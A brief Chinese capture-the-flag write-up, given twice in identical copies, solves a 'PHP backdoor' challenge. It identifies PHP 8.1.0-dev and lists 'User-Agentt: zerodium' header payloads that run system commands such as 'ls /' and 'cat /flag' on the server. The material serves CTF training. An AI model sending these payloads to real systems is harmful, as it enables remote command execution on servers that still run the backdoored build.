1、青少年ctf,题目PHP后门
2、页面
3、bp抓包发现PHP版本为8.1.0-dev
4、尝试使用以前爆出过的漏洞(网上查相关案例)
User-Agentt: zerodiumvar_dump(5*5);
User-Agentt: zerodiumsystem("cat /flag");
5、查找flag
User-Agentt: zerodiumsystem("ls /");
User-Agentt: zerodiumsystem("cat /flag");
1、青少年ctf,题目PHP后门
2、页面
3、bp抓包发现PHP版本为8.1.0-dev
4、尝试使用以前爆出过的漏洞(网上查相关案例)
User-Agentt: zerodiumvar_dump(5*5);
User-Agentt: zerodiumsystem("cat /flag");
5、查找flag
User-Agentt: zerodiumsystem("ls /");
User-Agentt: zerodiumsystem("cat /flag");